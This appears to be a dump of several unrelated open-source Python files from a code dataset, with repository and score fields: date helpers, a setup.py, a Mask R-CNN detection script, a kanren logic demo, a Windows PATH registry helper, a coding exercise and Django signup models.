def char_count(text, anchor):
"""
    Count how many times the anchor string appears in the text
:param text:
:param anchor:
:return:
"""
return len(text.split(anchor)) - 1
def date_to_stamp(date):
"""将日期转化为时间戳
:param date: 待转化的日期
:return: 转化后的时间数据
"""
    # First parse into a time struct; the full format would be "%Y-%m-%d %H:%M:%S"
    timeArray = time.strptime(date, "%Y-%m-%d")
    # Convert the struct to a Unix timestamp
time_stamp = int(time.mktime(timeArray))
return time_stamp
def stamp_to_time(time_stamp):
"""将时间戳转化成普通时间的格式
:param time_stamp: 时间戳
:return: 时间戳对应的日期
"""
stamp = time.localtime(time_stamp)
local_time = time.strftime("%Y-%m-%d", stamp)
return local_time
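# Round-trip sketch (the exact timestamp depends on the local timezone):
#   stamp_to_time(date_to_stamp('2021-11-28')) == '2021-11-28'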
if __name__ == '__main__':
print(get_numbers("abc123"))
print(char_count('我们是谁是谁是啥', '是'))
# write_json('./a', ['a', 'b', 'v'])
# print(read_json('./a'))
| 2.828125 | 3 |
setup.py | pypyr-scheduler/pypyr-scheduler-rpc-client | 1 | 12773244 | from setuptools import (setup, find_namespace_packages)
from os import path
from pyrsched.rpc import (NAME, VERSION)
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
LONG_DESCRIPTION = f.read()
setup(
name=NAME,
version=VERSION,
description="RPC client for pypyr-scheduler-server",
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
url=f"https://github.com/pypyr-scheduler/{NAME}",
license='MIT',
author='<NAME>',
author_email="<EMAIL>",
classifiers=[
'Intended Audience :: Developers',
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 3.7",
],
keywords=["Pypyr", "Scheduler", "Taskrunner"],
packages=find_namespace_packages(include=['pyrsched.*', ]),
namespace_packages=['pyrsched'],
include_package_data=True,
setup_requires=['pytest-runner'],
tests_require=['pytest'],
)
| 1.46875 | 1 |
detection/run_mask.py | katerynaCh/Finnish-WW2-photographers-analysis | 3 | 12773245 | import sys
sys.path.append('../src/')
import os
import numpy as np
from mask_rcnn.mrcnn import utils
import mask_rcnn.mrcnn.model as modellib
from mask_rcnn.samples.coco import coco
import cv2
import argparse as ap
class InferenceConfig(coco.CocoConfig):
# Set batch size to 1 since we'll be running inference on
# one image at a time. Batch size = GPU_COUNT * IMAGES_PER_GPU
GPU_COUNT = 1
IMAGES_PER_GPU = 1
def get_mask_rcnn(model, image, COCO_MODEL_PATH):
# Run detection
results = model.detect([image], verbose=1)
r = results[0]
idx = np.where(r['class_ids'] != 0) #select non-background
boxes = r['rois'][idx]
scores = r['scores'][idx]
classes = r['class_ids'][idx]
#score threshold = 0.7
idxs = np.where(scores > 0.7)
boxes = boxes[idxs]
people_scores = scores[idxs]
classes = classes[idxs]
return boxes, scores, classes
def run(read_direc, save_direc, model, COCO_MODEL_PATH, class_names, save_image=False):
if os.path.exists('./processed_images_mask.txt'):
with open('./processed_images_mask.txt', 'r') as f:
processed_files = f.readlines()
else:
processed_files = []
print('Started:', save_direc, read_direc)
if not os.path.exists(save_direc+'/'):
os.mkdir(save_direc+'/')
if save_image:
if not os.path.exists(save_direc+'/images_mask/'):
os.mkdir(save_direc + '/images_mask/')
i=0
for fi in os.listdir(read_direc):
if fi + '\n' in processed_files:
print('Skipping ', fi)
continue
image = cv2.imread(read_direc +fi)
#histogram equalization
image = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
image[:,:,2] = cv2.equalizeHist(image[:,:,2])
image = cv2.cvtColor(image, cv2.COLOR_HSV2BGR)
i = i+1
if i % 1000 == 0:
            print('Processed ' + str(i) + ' images')
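        # detection runs on a fixed 540x960 resize; the scalers below map the boxes back to the original resolution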
scaler_y = np.shape(image)[0]/960
scaler_x = np.shape(image)[1]/540
image1 = cv2.resize(image, (540, 960))
mask_boxes, mask_scores, mask_classes = get_mask_rcnn(model, image1, COCO_MODEL_PATH)
for bbox, score, classid in zip(mask_boxes, mask_scores, mask_classes):
bbox[1] = int(bbox[1])*scaler_x
bbox[0] = int(bbox[0])*scaler_y
bbox[3] = int(bbox[3])*scaler_x
bbox[2] = int(bbox[2])*scaler_y
with open(save_direc+'/groundtruth_boxes_mask.txt', 'a') as f:
f.write(str(fi) + ' ' + str(bbox[1])+ ' ' + str(bbox[0]) + ' ' + str(bbox[3]) + ' ' + str(bbox[2]) + ' ' + str(score) + ' ' + class_names[classid] + '\n')
if save_image:
cv2.rectangle(image, (int(bbox[1]+1), int(bbox[0]+1)), (int(bbox[3]+1), int(bbox[2]+1)), (0,255,0), 3)
cv2.putText(image, class_names[classid], (round(float(bbox[1])), round(float(bbox[0]))), cv2.FONT_HERSHEY_SIMPLEX, 4,(0,0,255),10,cv2.LINE_AA)
with open('./processed_images_mask.txt', 'a') as f:
f.write(fi + '\n')
if save_image:
cv2.imwrite(save_direc+'/images_mask/' + str(i) + '.jpg', image)
if __name__ == '__main__':
parser = ap.ArgumentParser()
parser.add_argument('-r', "--readdir", help="Directory with images")
parser.add_argument('-s', "--savedir", help="Directory for saving the detection results")
parser.add_argument('-i', "--saveimage", action='store_true', help="Save image with predicted bounding box or not")
args = vars(parser.parse_args())
read_direc = args['readdir']
save_direc = args['savedir']
COCO_MODEL_PATH = "../src/models/mask_rcnn_coco.h5"
MODEL_DIR = os.path.join('mask_rcnn/', "logs")
class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'trafficlight',
'fire hydrant', 'stop sign', 'parkingmeter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sportsball',
'kite', 'baseballbat', 'baseballglove', 'skateboard',
'surfboard', 'tennisracket', 'bottle', 'wineglass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hotdog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'pottedplant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cellphone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddybear', 'hairdrier', 'toothbrush']
config = InferenceConfig()
# Create model object in inference mode.
model = modellib.MaskRCNN(mode="inference", model_dir=MODEL_DIR, config=config)
# Load weights trained on MS-COCO
model.load_weights(COCO_MODEL_PATH, by_name=True)
run(read_direc, save_direc, model, COCO_MODEL_PATH, class_names, args['saveimage'])
print('Finished')
| 2.25 | 2 |
game/model/entity/damage/damage.py | AntonYermilov/progue | 0 | 12773246 | <reponame>AntonYermilov/progue
from dataclasses import dataclass
from enum import Enum
class DamageType(Enum):
PHYSICAL = 0
MAGIC = 1
HEALING = 2
@dataclass
class Damage:
"""
Damage class.
"""
damage_type: DamageType
damage_amount: int
confuse_turns: int = 0
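# Minimal usage sketch (names assumed for illustration, not part of the module):
#   hit = Damage(DamageType.PHYSICAL, damage_amount=10)
#   hit.confuse_turns defaults to 0, i.e. the target is not confused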
| 2.984375 | 3 |
tutorialspoint/logic_programming.py | enthusiasticgeek/AI | 0 | 12773247 | #!/usr/bin/env python3
from kanren import run, var, fact
from kanren.assoccomm import eq_assoccomm as eq
from kanren.assoccomm import commutative, associative
#define math operations
add = 'add'
mul = 'mul'
#define commutative/associative
fact(commutative, mul)
fact(commutative, add)
fact(associative, mul)
fact(associative, add)
#define variables
a, b = var('a'), var('b')
#Original pattern (5+a)*b
Original_pattern = (mul, (add, 5, a), b)
#Two Expressions
exp1 = (mul, (add,5,3), 4)
exp2 = (mul, 2, (add, 5, 1))
exp3 = (add, 5, (mul, 8, 1)) #(8*1+5)
#Output
print(run(0, (a,b), eq(Original_pattern, exp1)))
print(run(0, (a,b), eq(Original_pattern, exp2)))
print(run(0, (a,b), eq(Original_pattern, exp3)))
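# Expected results (assuming standard kanren unification semantics):
#   exp1 matches with a=3, b=4 -> ((3, 4),)
#   exp2 matches after commuting mul, with a=1, b=2 -> ((1, 2),)
#   exp3 has add at the top level, so it cannot match -> ()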
| 3.078125 | 3 |
recipes/Python/577233_Adding_directory_pythexecutable_system_PATH/recipe-577233.py | tdiprima/code | 2,023 | 12773248 | """
a small program to run after the installation of python on windows
adds the directory path to the python executable to the PATH env. variable
with optional parameter remove, removes it
you have to open a new command prompt to see the effects (echo %PATH%)
"""
import sys
import os
import time
import _winreg
import ctypes
def extend(pypath):
'''
extend(pypath) adds pypath to the PATH env. variable as defined in the
registry, and then notifies applications (e.g. the desktop) of this change.
Already opened DOS-Command prompt are not updated. Newly opened will have the
new path (inherited from the updated windows explorer desktop)
'''
hKey = _winreg.OpenKey (_winreg.HKEY_LOCAL_MACHINE,
r'SYSTEM\CurrentControlSet\Control\Session Manager\Environment',
0, _winreg.KEY_READ | _winreg.KEY_SET_VALUE)
value, typ = _winreg.QueryValueEx (hKey, "PATH")
vals = value.split(';')
assert isinstance(vals, list)
if len(sys.argv) > 1 and sys.argv[1] == 'remove':
try:
vals.remove(pypath)
except ValueError:
print 'path element', pypath, 'not found'
return
print 'removing from PATH:', pypath
else:
if pypath in vals:
print 'path element', pypath, 'already in PATH'
return
vals.append(pypath)
print 'adding to PATH:', pypath
_winreg.SetValueEx(hKey, "PATH", 0, typ, ';'.join(vals) )
_winreg.FlushKey(hKey)
# notify other programs
SendMessage = ctypes.windll.user32.SendMessageW
HWND_BROADCAST = 0xFFFF
WM_SETTINGCHANGE = 0x1A
SendMessage(HWND_BROADCAST, WM_SETTINGCHANGE, 0, u'Environment')
def find_python():
'''
retrieves the commandline for .py extensions from the registry
'''
hKey = _winreg.OpenKey(_winreg.HKEY_CLASSES_ROOT,
r'Python.File\shell\open\command')
# get the default value
value, typ = _winreg.QueryValueEx (hKey, None)
program = value.split('"')[1]
if not program.lower().endswith(r'\python.exe'):
return None
return os.path.dirname(program)
pypath = find_python()
if pypath:
    extend(pypath)
else:
    print 'could not locate python.exe via the file association in the registry'
| 3.515625 | 4 |
programming/coursera/algorithmic_toolbox/week_1/MaximumPairwiseProduct.py | vamsitallapudi/Coderefer-Python-Projects | 1 | 12773249 | <filename>programming/coursera/algorithmic_toolbox/week_1/MaximumPairwiseProduct.py
# python3
def max_pairwise_product(numbers):
x = sorted(numbers)
n = len(numbers)
return x[n-1] * x[n-2]
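# Hedged alternative (a sketch, not part of the original submission): a single
# O(n) pass tracking the two largest values avoids the O(n log n) sort.
# Assumes non-negative inputs, as in the course's problem statement.
def max_pairwise_product_linear(numbers):
    first = second = 0
    for x in numbers:
        if x > first:
            first, second = x, first
        elif x > second:
            second = x
    return first * second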
if __name__ == '__main__':
input_n = int(input())
input_numbers = [int(x) for x in input().split()]
print(max_pairwise_product(input_numbers))
| 4.34375 | 4 |
signup/models.py | p2pu/mechanical-mooc | 12 | 12773250 | import random
import string
from datetime import datetime
import json
from signup import db
from signup import emails
from mailgun import api as mailgun_api
from sequence import models as sequence_model
def create_signup( email, questions ):
""" Add signup to the current sequence """
sequence = sequence_model.get_current_sequence_number()
if db.UserSignup.objects.filter(email__iexact=email, sequence=sequence).exists():
raise Exception('Signup already exists')
invite_code=''.join([
random.choice(string.letters+string.digits) for i in range(32)
])
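    # NOTE: 32-character alphanumeric token; random.choice is not
    # cryptographically strong (random.SystemRandom would be, if that matters)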
now = datetime.utcnow()
signup = db.UserSignup(
email=email,
invite_code=invite_code,
questions=json.dumps(questions),
sequence=sequence,
date_added=now,
date_updated=now
)
signup.save()
return _signup2json(signup)
def update_signup( email, questions ):
""" Update the signup if it exists for the current sequence. If the signup was previously delete it will be undeleted """
sequence = sequence_model.get_current_sequence_number()
signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence)
old_questions = json.loads(signup_db.questions)
for key, value in questions.items():
old_questions[key] = value
signup_db.questions = json.dumps(old_questions)
signup_db.date_updated = datetime.utcnow()
signup_db.date_deleted = None
signup_db.save()
return _signup2json(signup_db)
def create_or_update_signup( email, questions ):
# check if user is already added to the current sequence
sequence = sequence_model.get_current_sequence_number()
if db.UserSignup.objects.filter(email__iexact=email, sequence=sequence).exists():
return update_signup(email, questions)
else:
return create_signup(email, questions)
def delete_signup( email, sequence ):
if db.UserSignup.objects.filter(email__iexact=email, sequence=sequence, date_deleted__isnull=False).exists():
raise Exception('Signup already deleted')
signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence)
signup_db.date_deleted = datetime.utcnow()
signup_db.save()
def _signup2json( signup_db ):
signup = {
'email': signup_db.email,
'questions': json.loads(signup_db.questions),
'sequence': signup_db.sequence,
'date_created': signup_db.date_added,
'date_updated': signup_db.date_updated,
'date_deleted': signup_db.date_deleted,
'key': signup_db.invite_code
}
return signup
def get_signup( email, sequence ):
if not db.UserSignup.objects.filter(email__iexact=email, sequence=sequence, date_deleted__isnull=True).exists():
raise Exception(u'Signup for {0} not found'.format(email))
signup_db = db.UserSignup.objects.get(email__iexact=email, sequence=sequence, date_deleted__isnull=True)
return _signup2json(signup_db)
def get_all_user_signups( email ):
signups = db.UserSignup.objects.filter(email__iexact=email, date_deleted__isnull=True)
return [ _signup2json(su) for su in signups ]
def get_signup_by_invite_code( invite_code ):
user_set = db.UserSignup.objects.filter(
invite_code=invite_code,
date_deleted__isnull=True
)
if not user_set.exists():
raise Exception()
return _signup2json(user_set[0])
def get_signups( sequence ):
signups = db.UserSignup.objects.filter(date_deleted__isnull=True)
if sequence:
signups = signups.filter(sequence=sequence)
return [_signup2json(signup) for signup in signups]
def get_signups_for_archiving( sequence ):
""" Only use this for archiving."""
sequence = int(sequence)
# TODO this is messy!
signups = db.UserSignup.objects.raw('select distinct on (email) * from signup_usersignup where sequence= '+ str(sequence) +' order by email, date_added DESC;')
return [_signup2json(signup) for signup in signups]
def get_new_signups( ):
""" get signups where the welcome email hasn't been sent yet """
signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)
return [_signup2json(signup) for signup in signups]
def handle_new_signups( ):
""" Send welcome email to new users.
Add them to a general mailing list.
Update db when done. """
signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)[:500]
while len(signups):
#TODO emails.send_welcome_emails([signup.email for signup in signups])
for signup in signups:
add_user_to_global_list(signup.email, signup.sequence)
#make sure new signups aren't in the mailgun blocked list
mailgun_api.delete_all_unsubscribes(signup.email)
db.UserSignup.objects.filter(id__in=signups.values('id')).update(date_tasks_handled=datetime.utcnow())
signups = db.UserSignup.objects.filter(date_tasks_handled__isnull=True, date_deleted__isnull=True)[:500]
def add_user_to_global_list( email, sequence ):
""" add user to email list that gets all emails """
signup_db = db.UserSignup.objects.get(
email__iexact=email, date_deleted__isnull=True, sequence=sequence
)
if signup_db.sequence:
list_name = sequence_model.sequence_list_name(signup_db.sequence)
mailgun_api.add_list_member(list_name, email)
| 2.71875 | 3 |